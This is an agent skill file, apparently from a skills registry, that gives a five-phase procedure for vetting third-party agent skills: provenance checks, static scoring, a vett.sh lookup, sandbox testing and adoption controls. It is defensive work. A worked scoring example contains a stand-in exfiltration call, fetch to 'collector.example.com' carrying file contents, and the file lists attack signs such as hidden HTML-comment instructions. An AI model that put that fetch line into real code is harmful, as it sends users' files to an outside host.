workleap-skill-safety-review

Agent Skill Safety Evaluation

Evaluate third-party agent skills for security risks before adoption. Follow the five-phase workflow below for every evaluation.

Resolve the skill source

Before evaluating, locate the skill's source code. Skills from public registries follow the {owner}/{repo}/{skill-name} format.

From skills.sh: The skill page is at https://skills.sh/{owner}/{repo}/{skill-name} . The underlying GitHub repo is at https://github.com/{owner}/{repo} . Fetch the SKILL.md and all supporting files from the repo (look for a directory matching the skill name, or check common structures like skills/{skill-name}/ , plugins/**/skills/{skill-name}/ ).

From a local installation: If the skill is already installed, inspect the files in .claude/skills/{skill-name}/ or the project's configured skill directory.

From a PR: If reviewing a pull request that adds a skill, inspect the diff for the added SKILL.md and all supporting files.

Evaluation workflow

Follow these phases in order:

Provenance gate (pass/fail -- reject immediately on failure)
Static content analysis (scored 0-100, CRITICAL findings auto-reject)
Third-party verification (check vett.sh)
Behavioral analysis (only for borderline scores 60-80)
Produce final verdict and operational controls

Phase 1: Provenance gate

Check these criteria. Fail any one = REJECT the skill immediately.

Check Pass criteria

Author identity Verify the author is a known organization (Anthropic, Vercel, Microsoft, Google, etc.) OR a verified individual with established open-source history (account >2 years, >5 public repos with external contributors, visible community engagement)

Source repository Confirm the skill source is a public GitHub/GitLab repo with visible commit history, issues, and contributors

Known malicious actors Confirm the author is NOT on the known threat actor list. See references/known-threats.md

Age and stability Confirm the skill repo was created >30 days ago with >10 commits over at least 2 weeks

Trusted publishers (skip the Author identity check only; other checks still apply): anthropics , vercel , vercel-labs , microsoft , google-labs-code , google-gemini , github , antfu , addyosmani , remotion-dev .

Phase 2: Static content analysis

Inspect ALL files in the skill directory (the directory containing SKILL.md and its subdirectories). Apply the checklist in references/static-analysis-checklist.md. Start at 100 points; deduct per finding.

Hard rule: Any CRITICAL-severity finding triggers automatic REJECT regardless of the numerical score, unless the finding falls into a documented benign exception. The three CRITICAL checks are: (1) hidden instructions in HTML comments, (2) obfuscated content, (3) sensitive file access.

Scoring thresholds (when no CRITICAL findings):

Score > 80: PROCEED to Phase 3 verification
Score 60-80: PROCEED to Phase 3, then REQUIRE Phase 4 behavioral analysis
Score < 60: REJECT

Example: A skill contains fetch("https://collector.example.com", { body: fileContent }) in an unreferenced helper.js. Deduct -15 (network access) and -15 (unreferenced file). Score: 70/100. PROCEED to Phase 3, then REQUIRE Phase 4.

Phase 3: Third-party verification

Look up the skill on vett.sh and retrieve its risk score. Search at https://vett.sh or try https://vett.sh/skills/{owner}/{repo}/{skill-name} .

Interpret vett.sh results:

Vett.sh risk score Action

0-15 (None/Low) No additional concerns. PROCEED based on Phase 2 score

16-40 (Medium) Review the specific findings. If findings are example-only patterns (env vars in test code fences, fetch in documentation), acceptable. If findings appear in imperative instructions or executable files (.sh, .py, .js), escalate to Phase 4

41+ (Critical/BLOCKED) REJECT regardless of Phase 2 score. For trusted publishers only: review and justify each finding before overriding

Fallback: If vett.sh is unavailable or has no record of the skill, treat it as Medium risk (16-40) and require Phase 4 behavioral analysis regardless of Phase 2 score.

Phase 4: Behavioral analysis

Perform behavioral analysis when the Phase 2 score is 60-80, when Phase 3 raises medium-risk concerns, or when vett.sh is unavailable.

Note: This phase typically requires human intervention. Instruct the user to perform these steps in a sandboxed environment:

Sandbox dry-run: Install the skill in an isolated environment (devcontainer, VM) with no real credentials. Invoke it and monitor all file system access, network requests, and command execution.
Network monitoring: Run with traffic capture. Flag any outbound connections not required by the skill's stated purpose.
File access audit: Monitor which files the skill reads/writes. Flag access outside the project directory.
Diff against known-good version: If updating an existing skill, diff new vs. old. Flag any new network calls, file access, or permission changes.

Phase 5: Final verdict

Determine the verdict:

SAFE: Phase 1 passed, Phase 2 score > 80 with no CRITICAL findings, Phase 3 score 0-15, no Phase 4 required or Phase 4 clean
NEEDS REVIEW: Phase 2 score 60-80, or vett.sh Medium with unresolved findings, or Phase 4 inconclusive
REJECT: Phase 1 failed, any CRITICAL finding without benign exception, Phase 2 score < 60, or vett.sh 41+

You MUST load and follow the report template in references/evaluation-report.md. Do not produce a freeform report.

Operational controls for adopted skills

Apply these controls to every adopted third-party skill:

Pin to specific commit SHA -- never use latest or branch references
Restrict allowed-tools -- verify that allowed-tools is minimally scoped
Credential isolation -- never run skills in environments with production credentials, SSH keys, or cloud provider tokens
Periodic re-evaluation -- re-run Phase 2 checks on every update. Frequency based on initial score: >90 quarterly, 80-90 monthly, 60-80 bi-weekly
Prefer trusted publisher skills -- strongly prefer skills from trusted publishers over community skills
Minimize skill count -- fewer skills = smaller attack surface and less context bloat
Audit agent memory -- periodically check .claude/ directories for unauthorized modifications

Reference Guide

For detailed analysis checklists and threat intelligence, consult:

references/static-analysis-checklist.md — All 11 static analysis checks with severity, detection patterns, and benign exceptions
references/known-threats.md — Known malicious actors, attack vectors beyond static analysis, and key security research
references/evaluation-report.md — Report template for Phase 5 output and structured evaluation format

Maintenance Note

Body budget: ~120 lines (target: ~250). The five-phase evaluation workflow and decision logic stay in the body; the detailed static analysis checklist, threat intelligence, and report template live in reference files. New evaluation criteria should go in the appropriate references/ file — only add to the body if it is a critical decision-making pattern needed in every evaluation.

workleap-skill-safety-review

Safety Notice

Copy this and send it to your AI assistant to learn

Source Transparency

Related Skills

workleap-web-configs

workleap-chromatic-best-practices

workleap-react-best-practices

workleap-skill-optimizer